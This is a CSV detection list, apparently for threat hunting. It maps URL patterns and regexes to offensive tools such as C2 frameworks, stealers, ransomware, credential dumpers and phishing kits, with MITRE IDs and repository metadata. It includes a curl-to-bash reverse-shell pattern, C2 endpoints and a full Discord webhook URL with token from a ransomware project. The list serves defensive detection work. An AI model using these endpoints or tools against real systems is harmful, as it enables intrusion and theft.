"*https://bruteratel.com:65000/activate*",".{0,1000}https\:\/\/bruteratel\.com\:65000\/activate.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","47705"
"*https://C2_SERVER_IP/*",".{0,1000}https\:\/\/C2_SERVER_IP\/.{0,1000}","offensive_tool_keyword","ServerlessRedirector","Serverless Redirector in various cloud vendor for red team","T1090.003 - T1095 - T1001.003","TA0010 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/KINGSABRI/ServerlessRedirector","1","0","#content","N/A","10","1","72","10","2022-12-08T08:56:02Z","2022-12-08T07:52:49Z","47708"
"*https://cdn.discordapp.com/attachments/976805447266877471/987826721250238464/c33cd7baf5e2abdf434c2793988ccb56.png*",".{0,1000}https\:\/\/cdn\.discordapp\.com\/attachments\/976805447266877471\/987826721250238464\/c33cd7baf5e2abdf434c2793988ccb56\.png.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","N/A","10","","N/A","","","","47710"
"*https://cmd5.la/*",".{0,1000}https\:\/\/cmd5\.la\/.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47713"
"*https://cnc.mkbot.info/alertmsg.zip*",".{0,1000}https\:\/\/cnc\.mkbot\.info\/alertmsg\.zip.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","47714"
"*https://cnc.mkbot.info/handshake.php*",".{0,1000}https\:\/\/cnc\.mkbot\.info\/handshake\.php.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","47715"
"*https://code.google.com/p/creddump/*",".{0,1000}https\:\/\/code\.google\.com\/p\/creddump\/.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","1","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","47716"
"*https://code.kryo.se/iodine/iodine-*",".{0,1000}https\:\/\/code\.kryo\.se\/iodine\/iodine\-.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","1","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","47717"
"*https://codeberg.org/RipperSec/MegaMedusa*",".{0,1000}https\:\/\/codeberg\.org\/RipperSec\/MegaMedusa.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","47718"
"*https://crack.sh/get-cracking/*",".{0,1000}https\:\/\/crack\.sh\/get\-cracking\/.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","1","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","47720"
"*https://cracker.okx.ch*",".{0,1000}https\:\/\/cracker\.okx\.ch.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47721"
"*https://crackstation.net/*",".{0,1000}https\:\/\/crackstation\.net\/.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Credential Access","https://github.com/LasCC/Hack-Tools","1","1","N/A","N/A","9","10","6045","678","2025-01-05T23:10:49Z","2020-06-22T21:42:16Z","47722"
"*https://curlshell:*",".{0,1000}https\:\/\/curlshell\:.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","#linux","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","47725"
"*https://curlshell:* | bash",".{0,1000}https\:\/\/curlshell\:.{0,1000}\s\|\sbash","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","#linux","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","47726"
"*https://cutt.ly/syFzILH*",".{0,1000}https\:\/\/cutt\.ly\/syFzILH.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","47727"
"*https://cyseclabs.com/exploits/*",".{0,1000}https\:\/\/cyseclabs\.com\/exploits\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","47728"
"*https://default-password.info/*",".{0,1000}https\:\/\/default\-password\.info\/.{0,1000}","offensive_tool_keyword","default-password.info","default passwords database","T1110 - T1082","TA0006 - TA0001","N/A","N/A","Credential Access","https://default-password.info/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","47729"
"*https://dehash.me*",".{0,1000}https\:\/\/dehash\.me.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47730"
"*https://dev.tuns.sh*",".{0,1000}https\:\/\/dev\.tuns\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","47731"
"*https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/*",".{0,1000}https\:\/\/dirkjanm\.io\/abusing\-azure\-ad\-sso\-with\-the\-primary\-refresh\-token\/.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","1","N/A","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","47732"
"*https://discord.com/api/webhooks/1172456340560560180/KwaMHIPwjfbQIhVUB-mOHNRiHoNnyAzzQcvgvjJHqGAfLSXahTDKwB1SVuq__NVlPbeQ*",".{0,1000}https\:\/\/discord\.com\/api\/webhooks\/1172456340560560180\/KwaMHIPwjfbQIhVUB\-mOHNRiHoNnyAzzQcvgvjJHqGAfLSXahTDKwB1SVuq__NVlPbeQ.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","1","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","47733"
"*https://discord.com/invite/5Hpj4Gs5SS*",".{0,1000}https\:\/\/discord\.com\/invite\/5Hpj4Gs5SS.{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","1","N/A","AD Enumeration","7","10","1290","131","2025-03-12T10:53:09Z","2023-09-26T12:36:59Z","47734"
"*https://dns.blokada.org/dns-query*",".{0,1000}https\:\/\/dns\.blokada\.org\/dns\-query.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","47735"
"*https://dns10.quad9.net:5053/dns-query*",".{0,1000}https\:\/\/dns10\.quad9\.net\:5053\/dns\-query.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","47736"
"*https://dnsdumpster.com/*",".{0,1000}https\:\/\/dnsdumpster\.com\/.{0,1000}","offensive_tool_keyword","dnsdumpster","dns recon & research - find & lookup dns records","T1018 - T1596.001 - T1590.002","TA0007 - TA0043","N/A","Dispossessor","Reconnaissance","https://dnsdumpster.com/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A","47737"
"*https://docs.ssi.sh/*",".{0,1000}https\:\/\/docs\.ssi\.sh\/.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","47739"
"*https://downloads.hak5.org/cloudc2*",".{0,1000}https\:\/\/downloads\.hak5\.org\/cloudc2.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","47741"
"*https://drive.google.com/file/d/1WLJGs3ZUypf6hLh5WL4AJmsKdUOZo5yZ*",".{0,1000}https\:\/\/drive\.google\.com\/file\/d\/1WLJGs3ZUypf6hLh5WL4AJmsKdUOZo5yZ.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","47747"
"*https://drive.usercontent.google.com/download?id=1Up7tr9Zh2e7FVLOdx5J1We3GJLGxEAMO&export=download*",".{0,1000}https\:\/\/drive\.usercontent\.google\.com\/download\?id\=1Up7tr9Zh2e7FVLOdx5J1We3GJLGxEAMO\&export\=download.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","47748"
"*https://emkei.cz/*",".{0,1000}https\:\/\/emkei\.cz\/.{0,1000}","offensive_tool_keyword","emkei.cz","Free online fake mailer with attachments","T1071","TA0005","N/A","N/A","Defense Evasion","https://emkei.cz/","1","1","N/A","N/A","6","8","N/A","N/A","N/A","N/A","47754"
"*https://en.hackndo.com/remote-lsass-dump-passwords/*",".{0,1000}https\:\/\/en\.hackndo\.com\/remote\-lsass\-dump\-passwords\/.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","47755"
"*https://erwan2212.github.io/NTHASH-FPC*",".{0,1000}https\:\/\/erwan2212\.github\.io\/NTHASH\-FPC.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","47756"
"*https://ffuf.io.fi*",".{0,1000}https\:\/\/ffuf\.io\.fi.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","47759"
"*https://ffuf.io/FUZZ*",".{0,1000}https\:\/\/ffuf\.io\/FUZZ.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","47760"
"*https://forum.exploit.in/topic/*",".{0,1000}https\:\/\/forum\.exploit\.in\/topic\/.{0,1000}","offensive_tool_keyword","forum.exploit.in","a well-known cybercriminal forum where threat actors discuss exploits","T1583.001 - T1583.002 - T1583.006 - T1595.002 - T1596 - T1586 - T1071.001","TA0042 - TA0001 - TA0009","N/A","Black Basta","Exploitation tool","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","47766"
"*https://free-399rs-jio-recharge*",".{0,1000}https\:\/\/free\-399rs\-jio\-recharge.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","47767"
"*https://github.com/bitsadmin/*",".{0,1000}https\:\/\/github\.com\/bitsadmin\/.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","47770"
"*https://github.com/curl/curl/wiki/DNS-over-HTTPS*",".{0,1000}https\:\/\/github\.com\/curl\/curl\/wiki\/DNS\-over\-HTTPS.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","47771"
"*https://github.com/dekrypted/*",".{0,1000}https\:\/\/github\.com\/dekrypted\/.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","github user host multiple stealers projects","10","","N/A","","","","47772"
"*https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/raw/master/tools/ghostip.sh*",".{0,1000}https\:\/\/github\.com\/hackerschoice\/thc\-tips\-tricks\-hacks\-cheat\-sheet\/raw\/master\/tools\/ghostip\.sh.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","1","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","47773"
"*https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/raw/master/tools/whatserver.sh*",".{0,1000}https\:\/\/github\.com\/hackerschoice\/thc\-tips\-tricks\-hacks\-cheat\-sheet\/raw\/master\/tools\/whatserver\.sh.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","1","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","47774"
"*https://github.com/Lolliedieb/lolMiner-releases/releases/download/*",".{0,1000}https\:\/\/github\.com\/Lolliedieb\/lolMiner\-releases\/releases\/download\/.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","1","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","47775"
"*https://github.com/m0nad/Diamorphine*",".{0,1000}https\:\/\/github\.com\/m0nad\/Diamorphine.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","47776"
"*https://github.com/MadExploits/Privelege-escalation/raw/main/pwnkit*",".{0,1000}https\:\/\/github\.com\/MadExploits\/Privelege\-escalation\/raw\/main\/pwnkit.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a  web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","1","N/A","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","47777"
"*https://github.com/The-Viper-One*",".{0,1000}https\:\/\/github\.com\/The\-Viper\-One.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","47779"
"*https://github.com/threatexpress/red-team-scripts/blob/master/HostEnum.ps1*",".{0,1000}https\:\/\/github\.com\/threatexpress\/red\-team\-scripts\/blob\/master\/HostEnum\.ps1.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","47780"
"*https://github.com/trustedsec/specula/wiki/Why-am-I-seeing-this*",".{0,1000}https\:\/\/github\.com\/trustedsec\/specula\/wiki\/Why\-am\-I\-seeing\-this.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","1","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","47781"
"*https://gitlab.com/kalilinux/*",".{0,1000}https\:\/\/gitlab\.com\/kalilinux\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","47783"
"*https://gitlab.com/kalilinux/packages/asleap*",".{0,1000}https\:\/\/gitlab\.com\/kalilinux\/packages\/asleap.{0,1000}","offensive_tool_keyword","asleap","Exploiting a serious deficiency in proprietary Cisco LEAP networks","T1078 - T1557 - T1040","TA0006 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/joswr1ght/asleap","1","1","#linux","N/A","10","1","88","20","2021-06-21T00:13:17Z","2016-08-30T13:00:21Z","47784"
"*https://graph.microsoft.com/v1.0/drive/root:/testfoldera/{file_name}:/createUploadSession*",".{0,1000}https\:\/\/graph\.microsoft\.com\/v1\.0\/drive\/root\:\/testfoldera\/\{file_name\}\:\/createUploadSession.{0,1000}","offensive_tool_keyword","SharpExfil","C# executables to extract information from target environment using OneDrive API.","T1567.002 - T1020 - T1071.001","TA0005 - TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/adm1nPanda/SharpExfil","1","0","#content","N/A","8","1","6","1","2020-07-02T14:48:55Z","2019-07-27T05:28:40Z","47789"
"*https://gsocket.io/install.sh*",".{0,1000}https\:\/\/gsocket\.io\/install\.sh.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","47790"
"*https://hashcapture.com/*",".{0,1000}https\:\/\/hashcapture\.com\/.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","1","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","47791"
"*https://hashcracking.ru*",".{0,1000}https\:\/\/hashcracking\.ru.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47792"
"*https://hashes.com*",".{0,1000}https\:\/\/hashes\.com.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47793"
"*https://hashtoolkit.com/generate-hash/?text=*",".{0,1000}https\:\/\/hashtoolkit\.com\/generate\-hash\/\?text\=.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","47794"
"*https://i.imgur.com/RfsCOES.png*",".{0,1000}https\:\/\/i\.imgur\.com\/RfsCOES\.png.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","1","N/A","N/A","10","","N/A","","","","47798"
"*https://itm4n.github.io/windows-registry-rpceptmapper-eop/*",".{0,1000}https\:\/\/itm4n\.github\.io\/windows\-registry\-rpceptmapper\-eop\/.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","1","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","47801"
"*https://join-zoom-online-meeting*",".{0,1000}https\:\/\/join\-zoom\-online\-meeting.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","47802"
"*https://kali.download*",".{0,1000}https\:\/\/kali\.download\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","47805"
"*https://lea.kz*",".{0,1000}https\:\/\/lea\.kz.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47806"
